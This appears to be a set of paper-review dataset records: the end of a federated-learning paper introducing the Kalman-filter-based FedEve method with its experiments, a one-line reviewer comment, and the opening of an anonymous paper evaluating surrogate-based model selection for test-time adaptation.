\hat{\sigma}^2_{t+1}, \sigma^2_{R_t}, \sigma^2_{\text{fused}} \) is the variance of prediction, client drift and fused model. The complete proof of the bayesian filter can be found in appendix A.5. The application of Bayesian filtering allows for the interaction of period drift and client drift to generate a new model, which is characterized by a reduced level of variance as compared to the individual variances of period drift and client drift, as depicted in Figure 2(a). However, the computation of the new model is challenging due to the presence of infinite integrals in Equation (7) and \( \eta_t \), as it is a general framework for any prediction and observation function. In the following section, we will propose a specialized method to facilitate the convergence of FL. Figure 2: Illustrations of the framework and FedEve. 3.4 The FedEve Method The predict-observe framework has been proposed as a strategy for mitigating the challenges of period drift and client drift. However, it also raises some questions regarding the effective method of prediction and the variance associated with both period and client drift. In this section, we demonstrate that the utilization of momentum as a server optimization (Hsu et al., 2019; Reddi et al., 2020), can serve as an effective prediction method. Furthermore, we present a method for estimating the variance of period drift and client drift. In the context of the predict-observe framework, we have adapted it to a specific setting where Nesterov momentum is employed as the prediction function \( g(\cdot) \), and the observation function \( h(\cdot) \) is the average of the models from the clients the same as FedAvg. We have reformulated FedAvg in an incremental form as the starting point of our approach. \[ w_{t+1} = \sum_{k \in S_t} p_k w^k_t = w_t - \sum_{k \in S_t} p_k (w_t - w^k_t) \] \[ = w_t - \sum_{k \in S_t} p_k \Delta w^k_t = w_t - \Delta w_t. \] (9) This formulation facilitates the accumulation of \( \Delta w_t \) as the momentum on the server, which serves as a prediction of updates, as the empirical value of the hyperparameter \( \beta = 0.9 \) suggests that the direction of historical updates is likely to be maintained. By introducing the Nesterov momentum and specialize \( g(w_t) = w_t - \eta_g M_t \) in Equation (5) as the prediction function. Additionally, we specialize \( h(\hat{w}_{t+1}) = \hat{w}_{t+1} - \eta_g \Delta \hat{w}_t \) in Equation (4) as the observation function. Thus, the predict-observe equation can be rewritten as follow: \[ \hat{w}_{t+1} = w_t - \eta_g M_t + Q_t, \] \[ \tilde{w}_{t+1} = \hat{w}_{t+1} - \eta_g \Delta \tilde{w}_t + R_t, \] (10) (11) where \( M_t \) is the momentum (the accumulation of \( \Delta w_t \)) at \( t \)-th round, \( \Delta \tilde{w}_t \) is the average of model update in Equation (9) from clients at the states of \( \hat{w}_{t+1} \), and \( \eta_g \) is the global learning rate. By assuming a normal distribution for \( Q_t \) and \( R_t \) based on the equations (3), (4), and (5), the problem of infinite integral in Equation (7) and \( \eta_t \) can be solved in a closed-form, as detailed in reference A.5.2. Additionally, due to the normal distribution, the form of distribution like equations (6,7) is not necessary, and only the mean and variance are used to depict the model update process. Since these equations are linear in nature, the Bayesian filter can be specialized as the Kalman Filter (KF). The process of model update can thus be summarized as the use of KF, as represented by the following formulation: \[ \hat{w}_{t+1} = w_t - \eta_g M_t, \] \[ \tilde{\sigma}^2_{t+1} = \sigma^2_t + \sigma^2_{Q_t}, \] \[ K = \frac{\tilde{\sigma}^2_{t+1}}{\tilde{\sigma}^2_{t+1} + \sigma^2_{R_t}}, \] \[ M_{t+1} = M_t + K(\Delta \tilde{w}_t - M_t), \] \[ w_{t+1} = w_t - \eta_g M_{t+1}, \] \[ \sigma^2_{t+1} = (1 - K)\tilde{\sigma}^2_{t+1}. \] (12a) (12b) (12c) (12d) (12e) (12f) The six steps of model update for each communication round in our method are outlined in Equations (12a)-(12f). Equation (12a) predicts the model states \( w_t \) using the momentum \( M_t \). Equation (12b) estimates the variance of the prediction model by summing the variance of \( w_t \) and the period drift \( Q_t \). To provide a clear representation, the variance of the prediction model is represented by \( \sigma^- \) and the variance of the fused model is represented by \( \sigma^+ \). The core of our method is presented in Equation (12c), where the Kalman gain \( K \) is calculated based on the ratio of the variance of the prediction \( \tilde{\sigma}^2_{t+1} \) and the observation (client drift) \( R_t \). The value of \( K \) determines the relative weight of the prediction and observation when they are combined. Equation (12d) fuses the prediction and observation in a linear fashion, weighted by the Kalman gain \( K \) calculated in (12c). The fourth line updates the global model with the fused \( M_{t+1} \) calculated in (12c). Equation (12e) estimates the variance of the fused model \( w_{t+1} \) using \( K \) in (12d) and \( \tilde{\sigma}^2_{t+1} \) in (12b), which will be used in the next communication round. It is worth noting that all these calculations are performed on the server, thus our method retains the same level of communication cost as FedAvg while also being compatible with cross-device FL settings. While Equations (12a)-(12f) provide an efficient and accurate method for model updates, the variance of the period drift \( \sigma^2_{Q_t} \) in Equation (12b) and the client drift \( \sigma^2_{R_t} \) in Equation (12c) remains unresolved. To address this issue, we propose an effective method for estimating the variance of the period drift and client drift. The period drift, which is a measure of the deviation from the consistency of the optimization objective at each communication round, can be quantified by analyzing the discrepancy between the prediction and the observation. Specifically, this can be done by computing the variance between the momentum \( M_t \) and the average of the model updates \( \Delta \tilde{w}_t \). Similarly, the client drift, which represents the inconsistency of the updates made by different clients, can be estimated by computing the variance between the average of the model updates \( \Delta \tilde{w}_t \) and the updates made by each individual client \( \Delta \tilde{w}^k_t \). We formulate the estimation of the variance of period drift and client drift as follows: \[ \sigma_{Q_t}^2 := \frac{\sum_{i=1}^{d} (M_i - \Delta \tilde{w}_t)^2}{|S_t|d}, \] \[ \sigma_{R_t}^2 := \frac{\sum_{k \in S_t} \sum_{i=1}^{d} (\Delta \tilde{w}^k_{t,i} - \Delta \tilde{w}_t)^2}{|S_t|^2d}, \] where the index of model parameters is represented by the uppercase \( i \) and the dimension of the model is represented by \( d \). With the estimation of the variance of period drift and client drift, the overall process of model update can be described in Algorithm 1. The fundamental principle of FEDEVE is to calculate the Kalman gain \( K \) which is used to determine the relative weight of the prediction and observation when they are combined. The value of \( K \) is calculated based on the ratio of the variance of the prediction \( \sigma_{Q_t}^2 \) and the variance of the observation \( \sigma_{R_t}^2 \). This coefficient is used to adjust the update direction of the model. A small \( K \) means that the observation is close to the prediction, hence the update direction will also be close to the prediction. A large \( K \) means that the observation deviates significantly from the prediction, hence the update direction will deviate from the prediction and be closer to the observation. This allows the algorithm to adapt to different scenarios in which the observations may deviate more or less from the predictions. 4 EXPERIMENTS 4.1 SETUP Datasets and models. We evaluate FEDEVE on three computer vision (CV) and recommender system (RS) datasets under realistic cross-device FL settings. For CV dataset, we use FEMNIST\(^2\) (Caldas et al., 2018), consisting of 671,585 training examples and 77,483 test samples of 62 different classes including 10 digits, 26 lowercase and 26 uppercase images with 28x28 pixels, handwritten by 3400 users. We also use CIFAR-10/100\(^3\) (Caldas et al., 2018), consisting of 50,000 training examples and 10,000 test samples of 10/100 different classes with 32x32 pixels. For FEMNIST dataset, we use the lightweight model LeNet\(^5\) (LeCun et al., 1998) and for CIFAR-10/100 dataset, we use ResNet-18 (replacing batch norm with group norm (Hsieh et al., 2020; Reddi et al., 2020)). For RS dataset, we use MovieLens 1M\(^4\) (Harper and Konstan, 2015), including 1,000,209 ratings by unidentifiable 6,040 users on 3,706 movies. It is a click-through rate (CTR) task, and we use the popular DIN (Zhou et al., 2018) model. For performance evaluation, we follow a widely used leave-one-out protocol (Muhammad et al., 2020). For each user, we hold out their latest interaction as testset and use the remaining data as trainset, and binarize the user feedback where all ratings are converted to 1, and negative instances are sampled 4:1 for training and 99:1 for test times the number of positive ones. Federated learning settings. It is important to note that the datasets FEMNIST and MovieLens 1M have a “natural” non-iid distribution, which means that the data is split by “user id”. For example, in FEMNIST, images are handwritten by different users, and in MovieLens 1M, movies are rated by different users. Furthermore, we use the Dirichlet distribution, to simulate the label distribution skew setting for FEMNIST, as described in (Hsu et al., 2019). This distribution allows us to control the degree of heterogeneity by adjusting the hyperparameter \( \alpha \) (the smaller, the more non-iid). This allows us to test the robustness of the algorithm under different levels of heterogeneity, which is a common scenario in real-world FL settings. For the FL training, we set a total of \( T = 1500 \) communication rounds for the CV task and sample 10 clients per round with SGD optimizer. \(^2\)https://github.com/TalwalkarLab/leaf/tree/master/data/femnist \(^3\)https://www.cs.toronto.edu/~kriz/cifar.html \(^4\)https://grouplens.org/datasets/movielens/ \(^5\)LeCun, Y., Bottou, L., Bengio, Y., & Haffner, P. (1998). Gradient-based learning applied to document recognition. Proceedings of the IEEE, 86(11), 2278-2324. RS task, we set a total of $T = 1000$ communication rounds and sample 20 clients per round with Adam optimizer [Kingma and Ba (2014)]. In all datasets, each client trains for $E = 1$ epoch at the local update with a learning rate of $\eta_l = 0.01$. In our proposed FedEVE, we set the global learning rate $\eta_g = 1$ for all experiments. Baselines. To evaluate the performance of FedEVE, we compare it with several state-of-the-art FL methods: 1) The vanilla FL method FedAvg [McMahan et al. (2017)], which is a widely used method for FL; 2) A client-side FL method FedProx [Li et al. (2020b)], which improves the model aggregation by adding a proximal term to the local update; 3) A server-side FL method FedAvgM [Hsu et al. (2019)], which adapts the momentum in FL optimization; 4) A server-side FL method FedOpt [Reddi et al. (2020)], which introduces adaptive optimization methods in FL. See more experimental details in the Appendix B. 4.2 Analysis ![Visualization of period drift and its impact on performance.](image) Figure 3: Visualization of period drift and its impact on performance. (a) Visualization of period drift. The color of the scatter points represents different classes, and the size denotes the number of samples of a given class on a particular client. When data is more non-iid (smaller $\alpha$), the heterogeneity of sampled data distributions becomes more pronounced both within a given communication round (client drift) and between different communication rounds (period drift). (b) Visualization of its impact on performance. It is revealed in cross-device FL when data is rather non-iid, period drift has a greater effect than client drift. Appendix B.2 for setting details. Visualizing the period drift and its impact. Figure 3(a) visualizes the data distributions of these sampled clients. Client drift arises due to the shift in label distribution among sampled clients within a single round, while period drift results from the shift in the data distribution of participating clients across different rounds. The scatter points’ size and distribution grow more diverse both within and across communication rounds as the value of $\alpha$ decreases (indicating increasing non-iid). The implications of these drifts on the global model’s convergence are presented in Figure 3(b). Utilizing the vanilla FedAvg algorithm for illustration, we experimented with four settings: 1) FedAvg with iid data; 2) FedAvg experiencing only period drift; 3) FedAvg subject to only client drift; and 4) FedAvg impacted by both drifts (See appendix B.2 for detailed settings). As heterogeneity intensifies, the effects of both drifts become evident. Specifically, in a highly non-iid environment ($\alpha = 0.01$), FedAvg affected only by client drift yields results akin to the iid setting. In contrast, FedAvg influenced solely by period drift significantly disrupts the stability and convergence of the FL process. The combination of both drifts results in the poorest performance, underlining that in cross-device FL, period drift poses a more considerable challenge to model convergence than client drift. The performance of FedEVE. We evaluate our algorithm on real-world datasets and compare it with the relevant state-of-the-art methods in Tables 1 and 2. We conducted simulations on three datasets: FEMNIST, CIFAR-100, and MovieLens. The FEMNIST and Movielens datasets have a Table 1: Results on FEMNIST and CIFAR-100. The best method is highlighted in bold fonts. | Dataset | Methods/NonIID | natural | α = 1 | α = 0.1 | α = 0.01 | α = 1 | α = 0.1 | α = 0.01 | |---------|----------------|---------|-------|--------|--------|-------|--------|--------| | | FEDAVG | 82.57 ± 0.18 | 83.60 ± 0.11 | 82.02 ± 0.23 | 73.23 ± 1.36 | 47.04 ± 0.21 | 43.93 ± 0.36 | 30.11 ± 0.53 | | | FEDAVGM | 82.53 ± 0.43 | 83.67 ± 0.10 | 82.30 ± 0.49 | 74.96 ± 2.34 | 48.22 ± 0.19 | 44.74 ± 0.40 | 31.59 ± 0.98 | | | FEDPROX | 82.34 ± 0.17 | 83.58 ± 0.11 | 82.04 ± 0.27 | 74.16 ± 1.19 | 46.86 ± 0.38 | 43.74 ± 0.27 | 30.10 ± 0.55 | | | SCAFFOLD | 81.66 ± 0.28 | 83.06 ± 0.14 | 79.82 ± 0.42 | 5.13 ± 0.00 | 47.26 ± 1.49 | 36.36 ± 4.98 | 1.00 ± 0.00 | | | FEDOPT | 5.13 ± 0.00 | 81.86 ± 0.38 | 78.16 ± 0.39 | 5.13 ± 0.00 | 47.26 ± 1.49 | 45.43 ± 1.18 | 32.17 ± 1.38 | | | **FEDEVE** | **82.68 ± 0.19** | **83.81 ± 0.09** | **82.69 ± 0.31** | **75.99 ± 1.61** | **48.38 ± 0.24** | **45.68 ± 0.16** | **32.68 ± 0.62** | Table 2: Results on MovieLens-1M. The best method is highlighted in bold fonts. | AUC | HR@5 | HR@10 | NGCG@5 | NGCG@10 | |-----|------|-------|--------|---------| | FEDAVG | 0.7633 ± 0.0065 | 0.2774 ± 0.0100 | 0.4294 ± 0.0120 | 0.1835 ± 0.0058 | 0.2324 ± 0.0064 | | FEDAVGM | 0.7555 ± 0.0128 | 0.2705 ± 0.0384 | 0.4290 ± 0.0196 | 0.1771 ± 0.0319 | 0.2280 ± 0.0257 | | FEDPROX | 0.7819 ± 0.0033 | 0.2700 ± 0.0129 | 0.4279 ± 0.0083 | 0.1803 ± 0.0078 | 0.2310 ± 0.0065 | | FEDOPT | 0.7751 ± 0.0085 | 0.2868 ± 0.0055 | 0.4392 ± 0.0101 | 0.1886 ± 0.0044 | 0.2377 ± 0.0040 | | **FEDEVE** | **0.7967 ± 0.0016** | **0.2916 ± 0.0077** | **0.4460 ± 0.0088** | **0.1924 ± 0.0039** | **0.2407 ± 0.0037** | naturally-arising client partitioning setting in real-world FL scenarios, making them highly representative. For FEMNIST and CIFAR-100 datasets, each of the datasets includes three non-iid settings, established through the Dirichlet distribution partition method (Hsu et al., 2019). Generally, the results show that our proposed algorithm, FEDEVE, consistently outperforms the baselines, and the performance gains are more dominant in more non-iid settings (α = 0.01). We also conduct experiments with different local epochs (E), please refer to the appendix [B.3] for the setting details. Also, our FEDEVE has more leading advantages in RS experiments, indicating its large potential in real-world industrial applications. Our method can better utilize the server-side adaptation through the Bayesian filter’s predict-observer framework. Besides, it is important to note that our method does not introduce other hyperparameters while these baselines have multiple hyperparameters to tune, which means that our FEDEVE is more flexible and advantageous in real-world practices. Analysis of Kalman Gain in FEDEVE. We conducted an in-depth analysis of the Kalman Gain K of FedEve under various experimental settings, incorporating four levels of data heterogeneity and various local epochs, as shown in Figure 4. We observed that as data heterogeneity increases (i.e., as the value of α decreases), the Kalman Gain K progressively enlarges. With the rise of data heterogeneity, the period drift starts to play a more dominant role. In this context, the primary role of Kalman Gain K is to adjust the weights between global and local updates, as depicted by Equation (12b) and (12c). Further, according to Equation (12d), the model update tends to trust local updates more, stabilizing the optimization process. For varied counts of local updates, the relative change in Kalman Gain K is marginal. This is primarily because, in cross-device FL, the client drift is not a pivotal or dominant factor, which aligns with our prior analysis in Figure 3. 5 CONCLUSION In this work, we explored the impact of client drift and period drift on the performance of cross-device FL, discovering that period drift can be particularly harmful as data heterogeneity increases. To solve this challenge, we introduced a novel predict-observe framework and a method, FEDEVE, that views these drifts as noise associated with prediction and observation. By integrating these two sources in a principled way, we provided a better estimation of model update steps, reducing variance and improving the stability and convergence speed of FL. Our theoretical and empirical evaluations demonstrated that FEDEVE significantly outperforms alternative methods, shedding light on future directions for improving efficiency in FL. REFERENCES Barak Battash and Ofir Lindenbaum. Revisiting the noise model of stochastic gradient descent. *arXiv preprint arXiv:2303.02749*, 2023. Sebastian Caldas, Sai Meher Karthik Duddu, Peter Wu, Tian Li, Jakub Konečný, H Brendan McMahan, Virginia Smith, and Ameet Talwalkar. Leaf: A benchmark for federated settings. *arXiv preprint arXiv:1812.01097*, 2018. Hong-You Chen and Wei-Lun Chao. On bridging generic and personalized federated learning for image classification. In *International Conference on Learning Representations*, 2021. Yae Jee Cho, Jianyu Wang, and Gauri Joshi. Towards understanding biased client selection in federated learning. In *International Conference on Artificial Intelligence and Statistics*, pages 10351–10375. PMLR, 2022. Yann Fraboni, Richard Vidal, Laëtitia Kameni, and Marco Lorenzi. A general theory for client sampling in federated learning. In *Trustworthy Federated Learning: First International Workshop, FL 2022. Held in Conjunction with IJCAI 2022, Vienna, Austria, July 23, 2022, Revised Selected Papers*, pages 46–58. Springer, 2023. Yongxin Guo, Tao Lin, and Xiaoying Tang. Towards federated learning on time-evolving heterogeneous data. *arXiv preprint arXiv:2112.13246*, 2021. F Maxwell Harper and Joseph A Konstan. The movielens datasets: History and context. *Acm transactions on interactive intelligent systems (tiis)*, 5(4):1–19, 2015. Kevin Hsieh, Amar Phanishayee, Onur Mutlu, and Phillip Gibbons. The non-iid data quagmire of decentralized machine learning. In *International Conference on Machine Learning*, pages 4387–4398. PMLR, 2020. Tzu-Ming Harry Hsu, Hang Qi, and Matthew Brown. Measuring the effects of non-identical data distribution for federated visual classification. *arXiv preprint arXiv:1909.06335*, 2019. Peter Kairouz, H Brendan McMahan, Brendan Avent, Aurélien Bellet, Mehdi Bennis, Arjun Nitin Bhagoji, Kallista Bonawitz, Zachary Charles, Graham Cormode, Rachel Cummings, et al. Advances and open problems in federated learning. *Foundations and Trends® in Machine Learning*, 14(1–2):1–210, 2021. Sai Praneeth Karimireddy, Satyen Kale, Mehryar Mohri, Sashank J. Reddi, Sebastian U. Stich, and Ananda Theertha Suresh. SCAFFOLD: Stochastic Controlled Averaging for Federated Learning. *arXiv:1910.06378 [cs, math, stat]*, 2021. Diederik P Kingma and Jimmy Ba. Adam: A method for stochastic optimization. *arXiv preprint arXiv:1412.6980*, 2014. Hendrik Anthony Kramers. Brownian motion in a field of force and the diffusion model of chemical reactions. *Physica*, 7(4):284–304, 1940. Yann LeCun, Léon Bottou, Yoshua Bengio, and Patrick Haffner. Gradient-based learning applied to document recognition. *Proceedings of the IEEE*, 86(11):2278–2324, 1998. Tian Li, Anit Kumar Sahu, Ameet Talwalkar, and Virginia Smith. Federated learning: Challenges, methods, and future directions. *IEEE Signal Processing Magazine*, 37(3):50–60, 2020a. Tian Li, Anit Kumar Sahu, Manzil Zaheer, Maziar Sanjabi, Ameet Talwalkar, and Virginia Smith. Federated Optimization in Heterogeneous Networks. *arXiv:1812.06127 [cs, stat]*, 2020b. Tao Lin, Sebastian U Stich, Kumar Kshitij Patel, and Martin Jaggi. Don’t use large mini-batches, use local sgd. *arXiv preprint arXiv:1808.07217*, 2018. Tao Lin, Lingjing Kong, Sebastian U Stich, and Martin Jaggi. Ensemble distillation for robust model fusion in federated learning. *Advances in Neural Information Processing Systems*, 33:2351–2363, 2020.
X4ATu1huMJ
This paper only investigates the offline model selection, which may have limited insights to address the challenge of online model selection for TTA methods, particularly in light of the batch dependency analyzed in [3].
Realistic Evaluation of Test-Time Adaptation: Surrogate-Based Model Selection Strategies Anonymous authors Paper under double-blind review Abstract Test-Time Adaptation (TTA) has recently emerged as a promising strategy for tackling the problem of machine learning model robustness under distribution shifts. This setting constitutes a significant challenge as the model has to adapt to the new environment without any labeled data. Contemporary methods, such as neural networks, typically rely on a cumbersome hyper-parameter tuning procedure that leverages target labels, yet what happens when those labels are unavailable, as in the test-time adaptation scenario? In this work, we tackle this very problem of hyperparameter selection by evaluating several surrogate metrics (without any access to the test labels). The main goal of this work is to provide a realistic evaluation of TTA methods under different domain shifts, as well as evaluation of different strategies for model selection in TTA. Our main findings are: i) the accuracy of model selection strategies strongly varies across datasets and adaptation methods; ii) out of 6 evaluated approaches, only the AdaContrast method allows for surrogate-based model selection that matches oracle selection performance and iii) using a tiny-set of labeled test samples beats all competing selection strategies. Our findings underscore the need for future research in the field to conduct rigorous evaluations with explicitly stated model selection strategies, to give more realistic approximations of test-time adaptation methods performance. 1 Introduction Machine learning models typically assume that training and testing data originate from similar distribution. However, in real-world applications, one observes a distribution shift between the training (source) and testing (target) data domains. That, in turn, hurts the performance (sometimes drastically) of the model during test time. Unsupervised domain adaptation methods explore adapting a model trained on the source domain to the target one, having access only to unlabelled target data. Test-time adaptation (TTA) extends this scenario to the online setting, where the model needs to adapt on the fly. Recently, various approaches for test-time adaptation were developed. Some popular strategies involve entropy minimization on test data using pseudo-labeling (Wang et al., 2021). To increase the accuracy, extensive data augmentations can be used (Wang et al., 2022) or unreliable pseudo-labels can be filtered out (Niu et al., 2023). Yet, without any supervision at test time, errors in pseudo-labels are unavoidable. To avoid error accumulation model restart strategies are often employed (Niu et al., 2023; Wang et al., 2022), which are based on some heuristics. Despite, all of those challenges, existing test-time adaptation methods seem to work well, often significantly improving over the naive strategy (of using a source model without adaptation). However, the reliability of such methods in practical applications remains dubious. Press et al. (2023) showed that under extremely long scenarios all existing TTA method results in degraded performance compared to the source model. Similarly, Zhao et al. (2023) demonstrated that existing TTA methods are very vulnerable to the choice of hyper-parameters. Interestingly, there is no consensus in the community on how to select the hyper-parameters for a given method. This is especially crucial for TTA where there is no access to the labelled data. The recent benchmark (Zhao et al., 2023) compared accuracies of various TTA methods assuming oracle selection strategy, considering access to the test data labels. This provides a fair comparison between existing methods, but can only give an overly optimistic measure of their potential performance. Furthermore, some methods that score the best using oracle selection may still fall short when using a realistic model selection (e.g., due to the difficulty and sensitivity to hyper-parameter selection). To this end, given an unlabeled dataset and a set of candidate models, we want to find an answer to the following research question: **how can we select the most accurate model?** We propose and evaluate different surrogate measures that do not use test labels for model selection in TTA. Our results give a realistic estimate of the existing TTA method’s performance. A fair comparison with the oracle-based results can help with real-life TTA applications. Our contributions can be summarized as follows: - To the best of our knowledge, we are the first to provide an analysis of TTA methods performance under different model selection strategies. To this end, we identify intuitive and effective surrogate metrics of model performance and benchmark six state-of-the-art TTA methods, across four different datasets using six different model selection strategies. - Our benchmark reveals that the accuracy of model selection strategies strongly varies across datasets and adaptation methods. In particular, we show that the ranking of existing TTA methods changes across different selection strategies (i.e., the best method under oracle selection strategy is never the best when using surrogate strategies). Additionally, we show that across evaluated TTA selection methods only AdaContrast allows for consistent model selection that matches oracle selection, without access to the target labels. - With our detailed analysis we identify shortcomings of each of the analyzed surrogate metrics. We show that model selection is a very challenging problem, but access to the small labeled set greatly helps to improve the selection quality. Our work emphasizes the importance of future research in this field to carry out thorough assessments, using clearly defined model selection strategies as benchmarks. We also create a testbed for a more rigorous comparison of existing TTA approaches. ## 2 RELATED WORK ### Model selection in TTA. Usually, no model selection strategy is provided ([Niu et al., 2022](#), [Gong et al., 2022](#), [Niu et al., 2023](#), [Wang et al., 2021](#), [Döbler et al., 2023](#), [Wang et al., 2022](#), [Chen et al., 2022](#), [Yuan et al., 2023](#)), and only the final hyper-parameters are listed. This motivates us to perform rigorous evaluation of TTA methods, under different model selection strategies. A recent study shows that under oracle model selection strategy (accessing test labels) none of the existing methods are capable of addressing all common types of distribution shifts ([Zhao et al., 2023](#)). There is only one non-oracle-based model selection strategy reported in the literature. In ([Rusak et al., 2022](#)) authors use cross-dataset validation to perform hyper-parameters selection. In particular, they have used optimal parameters selected on the ImageNet-C dataset for testing on different benchmarks. We hypothesize that such a strategy can only work well if there is a similarity between the used datasets. Analogous strategy for parameter selection was used in ([Boudiaf et al., 2022](#)). The authors found that existing methods lack transferability, whereas the proposed parameter-free one (LAME) is robust to hyperparameter changes. ### Unsupervised model selection. ([Gulrajani & Lopez-Paz, 2021](#)) tested different strategies for unsupervised model selection in domain adaptation: i) source dataset accuracy ii) cross-dataset accuracy and iii) limited access to the target labels. They have shown that under such fair comparison, no domain adaptation method works better than standard empirical risk minimization training. This study was recently extended to partial domain adaptation by additionally incorporating other strategies based on surrogate (unsupervised) measures, such as entropy on model consistency on test data ([Salvador et al., 2022](#)). The unsupervised model selection problem was also studied in time-series anomaly detection ([Goswami et al., 2023](#)). Based on different surrogate metrics authors proposed a robust rank aggregation method which shown to obtain competitive results. We are inspired by those studies and examine various strategies for test-time adaptation under different domain shifts, to i) obtain a realistic approximation of current methods’ performance, and ii) validate surrogate measure applicability for hyper-parameter and model selection. One interesting aspect of test-time adaptation is that the sequence length can have an impact on optimal model parameters, and this is something we also investigate by running test-time adaptation on ImageNet-C with different lengths. 3 TEST-TIME ADAPTATION PROBLEM 3.1 PROBLEM FORMULATION Given the source model $f_{\theta_S}$, trained on the labeled data from the source domain $\mathcal{D}_S = \{\mathcal{X}_S, \mathcal{Y}_S\}$, the objective is to adapt it to the test data $\mathcal{D}_T = \{\mathcal{X}_T, \mathcal{Y}_T\}$. In the source data $\mathcal{D}_S$, sample-label pairs $(x_i \in \mathcal{X}_S, y_i \in \mathcal{Y}_S)$ are distributed according to the probability distribution $P_S(x, y)$. The test samples $x_i \in \mathcal{X}_T$ are modeled by a different distribution $P_T(x, y) \neq P_S(x, y)$. At each testing time step $t$, the TTA process aims to adapt the model $f_{\theta_S}$ to better align with the distribution $P_T$. Importantly, unlabeled data samples $x_t^i \sim P_T$ are the only information available regarding the unseen distribution $P_T$. Model selection, that is selecting both (i) an algorithm and (ii) its associated hyperparameter(s) is a crucial part of all machine learning pipelines. In a standard supervised learning setting, a validation set can be used to estimate the model’s accuracy. However, in TTA such an approach is not possible as there is no access to labeled target samples. Below, we discuss several approaches for model selection in TTA which we use in this work. 3.2 MODEL SELECTION STRATEGIES IN TTA Source accuracy (S-ACC). The most simple strategy uses a small validation set from the source domain to estimate the model’s performance in the target domain, e.g., in domain adaptation (Ganin & Lempitsky, 2015). This strategy assumes that the training and test examples follow similar distributions. However, interestingly, Miller et al. (2021) shows that there is a linear correlation between accuracy on i.i.d. and o.o.d. data which may favor such a strategy. Some TTA methods assume there is no access to the source data, e.g., because of privacy concerns (Liang et al., 2020). In such applications, this strategy may not be valid. Cross-validation accuracy (CROSS-ACC). Another reasonable approach is to select hyperparameters on some other dataset. This is a potentially valid strategy since already plenty of benchmarks exist for TTA, which could be utilized for this purpose. Here, we follow Rusak et al. (2022) and perform hyper-parameter selection on ImageNet-C dataset, which they show to work well. In our work, we additionally test whether the parameters tuned on one dataset also work well when we test on the same dataset i) but with increased sequence length, and ii) when temporal correlation between classes is changed. Entropy (ENT). Minimizing the Shannon entropy $H(\hat{y}) = -\sum_c p(\hat{y}_c) \log p(\hat{y}_c)$, where $\hat{y}_c$ is a probability prediction of class $c$, of predictions for target samples $\hat{y} = f_\theta(x_t^i)$ was introduced for test-time adaptation in Wang et al. (2021) because i) it is related to error, as more confident predictions are all-in-all more correct and ii) entropy is related to shifts due to corruption, as more corruption results in more entropy. This strategy was adopted by several works showing its efficiency (Niu et al., 2023; Wang et al., 2021; Niu et al., 2022). However, as shown by Boudiaf et al. (2022) in some scenarios the entropy does not correlate with the accuracy. Nevertheless, in our work, we decided to also include entropy as the surrogate measure, because of its simplicity and common usage. Model consistency (CON). Consistency regularization is an important component of many self-supervised learning algorithms (Sohn et al., 2020). It enforces the model $f_\theta$ to have similar predictions when fed perturbed versions $\tilde{x}_i$ of the same image $x_i$: $(f_\theta(x_i) \simeq f_\theta(\tilde{x}_i))$. It was also used to drive training of the model during the TTA phase (Nguyen et al., 2023). As the choice of perturbations, we use the augmentation pipeline introduced in CoTTA (Wang et al., 2022), as it is quite commonly used in TTA and was shown to work well. The augmentations include color jittering, Gaussian noise, and blur, etc., further information can be found in the Appendix (sec. A). Using test labels. We also incorporate ORACLE model selection strategy to measure upper-bound for evaluated methods and to see how close to it the other surrogate measure performs. Additionally, we use one more additional model selection strategy, 100-RND, that assumes limited access to the | TTA Methods | TENT, SAR, LAME, EATA, RMT, AdaContrast | |---------------------|----------------------------------------| | Model Selection Strategies | S-ACC, ENT, CROSS-ACC, DEV, 100-RND, ORACLE | | Tuned parameters | learning rate, momentum and method-specific parameters (SAR, EATA) | | Experimental protocol | 4 datasets, varying levels of temporal correlation and adaptation sequence length | Table 1: Summary of experimental setup considered in this work. test data. Following Salvador et al. (2022), we use labels from 100 randomly selected images from test data for model selection. 4 EXPERIMENTAL SETUP 4.1 DATASETS For experiments, we utilize two widely used datasets for TTA evaluation with artificial image corruptions: CIFAR100-C and ImageNet-C (Hendrycks & Dietterich, 2019). Moreover, we use two datasets consisting of images without corruptions, but portraying objects in different domains: DomainNet-126 (Saito et al., 2019) and ImageNet-R (Hendrycks et al., 2021). CIFAR100-C and ImageNet-C datasets are created by applying 15 different corruption types with 5 severity levels to the images from the test split of the clean CIFAR100 (Krizhevsky, 2009) and ImageNet (Deng et al., 2009) datasets, creating multiple domains. Following the state-of-the-art TTA works (Wang et al., 2022; Niu et al., 2022; Döbler et al., 2023), for testing TTA methods we utilize the standard sequence of corruption types with the 5th level of severity sequentially, without mixing the domains. The source models are trained on the clean CIFAR100 or ImageNet dataset. DomainNet-126 is a cleaned from noisy labels subset of the DomainNet dataset (Peng et al., 2019). It consists of images of 126 different objects from 4 different domains: real-world photos, clipart images, sketches, and paintings. The source model is trained on actual photos and adapted during test time to the images from the sequence of the remaining domains. ImageNet-R is composed of various renditions of 200 objects from the original ImageNet dataset, spanning various domains such as art, cartoons, graffiti, embroidery, origami, tattoos, and more. This dataset comprises a total of 30000 images. Source data come from the original ImageNet and TTA is tested on all of the rendition types at once. Additionally, inspired by Gong et al. (2022), we test the influence of temporally correlated class distribution within the CIFAR100-C test sequence on the performance of different models of TTA methods. For this purpose, we utilize Dirichlet distribution with different concentration parameters $\delta$ to sample the class exemplars. Moreover, we test the scenario of a long TTA operation by utilizing the ImageNet-C testing sequence ten times without any model reset in between the sequences. 4.2 METHODS In our testbed, we include the six different methods, which differ by the optimized objective, number of hyper-parameters, fine-tuned layers etc. TENT (Wang et al., 2021) is a popular TTA method that includes minimizing the entropy of the predictions while optimizing only batch norm statistics of the model. SAR (Niu et al., 2023) additionally applies filtering to remove noisy samples, uses a sharpness-aware optimizer that encourages flat minima, and finally applies a model reset scheme. EATA (Niu et al., 2022) uses a filtering scheme that removes not only noisy samples but also redundant ones and additionally introduces a Fisher regularizer to constrain important model parameters from drastic changes (this requires one-time access to the source data). In contrast to previous methods that use entropy minimization objective and fine-tune only batch normalization layers, AdaContrast (Chen et al., 2022) incorporates self-supervised contrastive objective with consistency regularization and fine-tune all weights of the model. RMT method (Döbler et al., 2023) also uses contrastive objective but additionally uses it to align the learned feature space with one of the source model combined with introduced symmetrical cross-entropy loss and weight averaging. Hyper-parameter sensitivity. A potential limitation of the above methods is that they require per-task parameter tuning, which can be a serious limitation in test-time adaptation, without access to test labels. In LAME, Boudiaf et al. (2022) analyzed hyperparameters sensitivity of the existing TTA methods and proposed a parameter-free approach that modifies only the model’s output (not its parameters) and solving the objective with a concave-convex procedure (i.e., without the need to tune learning rate). As a result, per each dataset, we run only one test with the LAME method and do not need to perform the hyper-parameter selection. Access to the source data. RMT method additionally assumes a replay mechanism of the source data, which may give this method an 